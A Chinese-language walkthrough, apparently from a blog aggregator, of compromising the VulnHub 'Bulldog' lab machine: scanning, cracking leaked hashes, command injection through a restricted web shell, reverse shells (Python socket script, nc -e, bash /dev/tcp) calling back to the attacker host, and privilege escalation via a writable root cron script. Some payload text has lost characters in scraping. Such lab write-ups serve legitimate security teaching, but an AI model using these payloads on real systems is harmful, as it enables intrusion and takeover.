VulnHub 系列:Bulldog,walkthrough
前言这个靶机在vmware安装后无法被扫描到ip。参照上一篇前言的方法修改靶机ip地址为静态192.168.152.129。一、信息收集1查看 kali 攻击机的 IP 地址ifconfig2查看同网段有哪些设备netdiscover -r 192.168.152.0/24Nmap 扫描端口和服务nmap -sS -sV -T4 -A -p- 192.168.152.129WSGI全称是 Web Server Gateway InterfaceWSGI 不是服务器、 python 模块、框架、API 或者任何软件只是一种规范描述 web server 如何与 web application 通信的规范。Dirb 目录爆破dirb http://192.168.152.129查看网页及源代码根据上面爆破出的目录对网页进行查看。/admin 是个管理员后台 常见的弱口令无法进入/dev 目录 网页上可以看到开发小组人员的邮箱和密码 hash 值可以发现都是用的公司的邮箱 那么邮箱里面可能就包含了开发小组人员的名字。解密常用网站 CMD5 SOMD5解密结果 alan 用户解密失败 william 用户解密失败 malik 用户解密失败 kevin 用 户解密失败 ashley 用户解密失败 nick/bulldog sarah/bulldoglover。2其他的有用信息• 网站使用的是 Django而不是 PHP并且没有使用 PHPMyAdmin 或者任何 有名的 CMS 框架• 开启了 SSH但很快就会被后续的 Web-Shell 取代并且下面给出了 Web- Shell 页面的连接二、反弹 shell使用 nick/bulldog 登录后台 http://192.168.152.129/admin 登录后台之后没有发现 什么有用的功能或信息。记得前面还有一个http://192.168.152.129/dev/shell/页面访问一下看看。根据页面的提示用户可以执行的命令只有上述的几个但是这里可以 使用将多个命令进行拼接那么就可以绕过限制。首先在 kali 攻击机上监听端口nc -lvp 12341.通过 bash(实测没有反弹成功)2.通过 python(成功反弹)1在kali机上编写 python 脚本内容如下vim python-shell.pyimport os,socket,subprocess; ssocket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((192.168.152.128,1234)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); psubprocess.call([/bin/bash,-i]);把python-shell.py 放在kali机桌面上以便后续操作。2在 kali 上使用 python 开启 HTTP 服务python3 -m http.server 803在http://192.168.152.129/dev/shell/ 页面使用 wget 下载 python 脚本pwdwget http://192.168.152.128/Desktop/python-shell.py4在 /dev/shell 页面执行脚本pwdpython python-shell.py3.通过 nc(需要靶机上安装了 nc。若无可先下载到kali机再通过wget下载到靶机)nc -e /bin/bash 192.168.152.128 12344.通过 echo(成功反弹)echo bash -i /dev/tcp/192.168.152.128/1234 01 | bash三、提权发现 home 目录下有一个 bulldogadmin那么优先查看这个目录。 结果执行 ls 命令时没有发现任何东西然后我执行了 ls -a发现了隐藏的文件夹。.hiddenadmindirectory 引起了注意接着在这个文件夹里面发现了 customPermissionApp 文件使用 file 命令查看一下这是个什么东西原来是个 ELF简单来说就是 Linux 的主要可执行文件格式。 然后就是这个目录下还有一个 note 文件是一些提示信息。后面就执行了 strings 命令。strings customPermissionApp神奇的是红框的地方SUPERultimatePASSWORDyouCANTget就是 django 账户的密码。SSH 登录确认一下。ssh -p 23 django192.168.152.1291第一种权限提升的方式查看 django 用户可以执行哪些命令id sudo -l我们可以看到 django 用户可以执行所有的命令于是我们通过执行以下命令切换 到 root 账户sudo su -2. 第二种权限提升的方式用了一个 Github 上的一个权限提升检查的脚本用以查看靶机上有哪些对权限提 升有帮助的东西linuxprivchecker.py。这个脚本可以做什么1枚举系统的基本信息2查找具有全局可写属性的文件3查找错误的配 置文件4查找明文密码5查找系统存在的可利用漏洞运行 linuxprivchecker 脚本看到了几个使用 root 权限执行的计划任务。这里从kali机下载curl -O http://192.168.152.128:8081/linuxprivchecker.py运行脚本python linuxprivchecker.py -w -o linuxprivchecker.log然后我们使用 cat 命令挨个查看几个计划任务发现 runAV 每分钟执行一次名叫 AVApplication.py 的 python 脚本。cat runAV并且这个脚本是全局用户可写的那么接下来的思路就是编辑这个脚本然后反弹 shell因为通过这种方式反弹 过来的 shell 是具有 root 权限的。vim /.hiddenAVDirectory/AVApplication.py在kali机上执行以下代码nc -nlvp 1234等待一分钟后id pwd ls cat congrats.txt

相关新闻

配电网P2P能源交易的分布式优化与ADMM应用

配电网P2P能源交易的分布式优化与ADMM应用

1. 项目概述 在电力系统市场化改革的背景下,点对点(P2P)能源交易正成为配电网运营的新范式。这个项目研究的是如何通过分布式优化方法,在考虑过网费用分摊的情况下,实现配电网中的高效能源交易。我们采用直流潮流模型作…

2026/10/11 4:48:28 阅读更多 →
2026年网络安全行业趋势与核心技能解析

2026年网络安全行业趋势与核心技能解析

1. 2026年网络安全行业的现状与挑战网络安全行业在2026年正面临前所未有的变革与挑战。随着数字化转型的深入,网络攻击手段日益复杂化,攻击频率和规模呈现指数级增长。根据行业数据显示,2026年全球网络攻击事件相比2020年增长了近300%&#x…

2026/10/10 14:21:06 阅读更多 →
LangChain与LangGraph实战:从零构建AI智能体开发环境与工作流

LangChain与LangGraph实战:从零构建AI智能体开发环境与工作流

这次我们来看一个面向2026年的Agent智能体框架自学教程。这个教程号称“最细最全”,覆盖了LangChain、LangGraph和MCP三大核心组件,目标是让开发者在一个月内快速掌握大模型Agent的开发能力。对于想进入AI应用层,特别是想构建具备自主推理和工…

2026/10/10 21:13:38 阅读更多 →

最新新闻

Mac外接硬盘无法写入?一文讲透文件系统格式、NTFS与exFAT的选择

Mac外接硬盘无法写入?一文讲透文件系统格式、NTFS与exFAT的选择

很多人第一次把移动硬盘插到 Mac 上,会遇到两种特别抓狂的情况:一种是从 Windows 电脑拿过来的 NTFS 硬盘,插上之后所有文件都能看,但想删一个、拖一个进去,系统直接提示“磁盘是只读的”;还有一种更离谱&a…

2026/10/11 4:52:24 阅读更多 →
企业微信API开发:修改配置为什么需要重启服务?

企业微信API开发:修改配置为什么需要重启服务?

在企业微信自动化系统中,接口地址、消息模板、发送规则和业务开关通常需要根据实际情况调整。 如果每次修改配置都必须重新部署或重启服务,不仅操作麻烦,还可能影响正在执行的任务。 可以根据配置类型,设计适合的更新机制。 一…

2026/10/11 4:52:24 阅读更多 →
跨会话记忆实战:用claude-mem为AI助手构建可检索记忆库

跨会话记忆实战:用claude-mem为AI助手构建可检索记忆库

上周我照常打开一个新的终端会话,让 AI 助手继续处理一个跟了三天的项目。它上来就问我要项目背景、依赖关系、之前定好的技术方案——那一刻我真的有点崩溃:同样的背景我至少解释过三次了。也就是从那时候起,我开始动手折腾 claude-mem 这类…

2026/10/11 4:52:24 阅读更多 →
多目标函数优化实战:从Pareto前沿到NSGA-II工程落地

多目标函数优化实战:从Pareto前沿到NSGA-II工程落地

简介:这份资源面向需要在MATLAB环境下处理多目标优化问题的学生、科研人员与数学建模竞赛选手,核心是提供一套可直接运行的多目标优化模型代码与遗传算法工具箱。包内共64个文件,以60个m脚本为主体,辅以txt说明、ps与pdf文档&…

2026/10/11 4:52:24 阅读更多 →
二进制全一序列算法:从位运算到大数取模的工程实践

二进制全一序列算法:从位运算到大数取模的工程实践

“算法111111”,这名字乍看像随手敲的占位符,但在我代码仓库里,它是个正经编号。所谓“111111”,不是六个一凑热闹,而是二进制下的全一序列:一位的 1、两位的 11、三位的 111,一直到六位的 1111…

2026/10/11 4:52:24 阅读更多 →
n8n集成APITemplate.io节点:自动化生成PDF报告完整指南

n8n集成APITemplate.io节点:自动化生成PDF报告完整指南

1. 这个节点到底解决什么问题我先说一个场景:你辛辛苦苦用n8n把订单数据、客户信息、库存报表全部串成了自动化流程,每天定时跑、遇到异常自动告警,一切都很顺利。直到有一天业务同事跑过来说:“能不能每天自动生成一份带logo、带…

2026/10/11 4:51:24 阅读更多 →

日新闻

流感时间序列预测实战:ARIMA/LSTM全流程拆解与避坑指南

流感时间序列预测实战:ARIMA/LSTM全流程拆解与避坑指南

简介:基于 ARIMA、LSTM、Transformer 等模型的流感时间序列预测 Python 源码,面向计算机相关专业课程设计与期末大作业学生,以及项目实战学习者。内容覆盖预处理、平稳性检验、定阶、残差分析、多模型对比预测的完整时序建模流程,…

2026/10/11 0:00:27 阅读更多 →
影刀RPA新手教程:键盘模拟输入实战——输入文本与模拟按键的区别

影刀RPA新手教程:键盘模拟输入实战——输入文本与模拟按键的区别

影刀RPA新手教程:键盘模拟输入实战——输入文本与模拟按键的区别 做影刀RPA自动化,十个新手有八个栽在"往输入框里填东西"这件事上:要么填不进去,要么填了一半,要么直接把原来内容追加在后面。这背后的根因&…

2026/10/11 0:00:27 阅读更多 →
影刀RPA新手教程:阅文起点小说数据采集实战——书籍信息与章节内容

影刀RPA新手教程:阅文起点小说数据采集实战——书籍信息与章节内容

影刀RPA新手教程:阅文起点小说数据采集实战——书籍信息与章节内容 1. 认识影刀:什么场景该用RPA采小说数据 起点中文网的页面结构相对稳定——分类榜单、书籍详情、章节内容三块独立页面,跳转链路清晰。这种场景非常适合影刀自动化&#x…

2026/10/11 0:00:27 阅读更多 →

周新闻

流感时间序列预测实战:ARIMA/LSTM全流程拆解与避坑指南

流感时间序列预测实战:ARIMA/LSTM全流程拆解与避坑指南

简介:基于 ARIMA、LSTM、Transformer 等模型的流感时间序列预测 Python 源码,面向计算机相关专业课程设计与期末大作业学生,以及项目实战学习者。内容覆盖预处理、平稳性检验、定阶、残差分析、多模型对比预测的完整时序建模流程,…

2026/10/11 0:00:27 阅读更多 →
影刀RPA新手教程:键盘模拟输入实战——输入文本与模拟按键的区别

影刀RPA新手教程:键盘模拟输入实战——输入文本与模拟按键的区别

影刀RPA新手教程:键盘模拟输入实战——输入文本与模拟按键的区别 做影刀RPA自动化,十个新手有八个栽在"往输入框里填东西"这件事上:要么填不进去,要么填了一半,要么直接把原来内容追加在后面。这背后的根因&…

2026/10/11 0:00:27 阅读更多 →
影刀RPA新手教程:阅文起点小说数据采集实战——书籍信息与章节内容

影刀RPA新手教程:阅文起点小说数据采集实战——书籍信息与章节内容

影刀RPA新手教程:阅文起点小说数据采集实战——书籍信息与章节内容 1. 认识影刀:什么场景该用RPA采小说数据 起点中文网的页面结构相对稳定——分类榜单、书籍详情、章节内容三块独立页面,跳转链路清晰。这种场景非常适合影刀自动化&#x…

2026/10/11 0:00:27 阅读更多 →

月新闻

我发现了一个新思路:用 Remotion + Claude Code 像写代码一样自动化生成短视频

我发现了一个新思路:用 Remotion + Claude Code 像写代码一样自动化生成短视频

/* MD / 富文本中的 .toc(含博客园搬家等嵌套结构);.toc-box 在侧栏,不受影响 */#content_views .toc,/* 编辑器常在目录前后插入空 p(:empty 仍占 20px),一并去掉避免顶空隙 */#content_views.markdown_views > p:empty:has(+ .toc),#content_views.markdown_views …

2026/10/10 5:23:50 阅读更多 →
Windows下 Codex 中 Chrome 和 Computer Use 插件不可用问题排查及解决参考方式:TaoToken 统一 Key 配置与验证

Windows下 Codex 中 Chrome 和 Computer Use 插件不可用问题排查及解决参考方式:TaoToken 统一 Key 配置与验证

/* MD / 富文本中的 .toc(含博客园搬家等嵌套结构);.toc-box 在侧栏,不受影响 */#content_views .toc,/* 编辑器常在目录前后插入空 p(:empty 仍占 20px),一并去掉避免顶空隙 */#content_views.markdown_views > p:empty:has(+ .toc),#content_views.markdown_views …

2026/10/9 21:32:20 阅读更多 →
黑夜航拍船只数据集训练YOLOV5模型全流程解析

黑夜航拍船只数据集训练YOLOV5模型全流程解析

/* MD / 富文本中的 .toc(含博客园搬家等嵌套结构);.toc-box 在侧栏,不受影响 */#content_views .toc,/* 编辑器常在目录前后插入空 p(:empty 仍占 20px),一并去掉避免顶空隙 */#content_views.markdown_views > p:empty:has(+ .toc),#content_views.markdown_views …

2026/10/10 10:38:42 阅读更多 →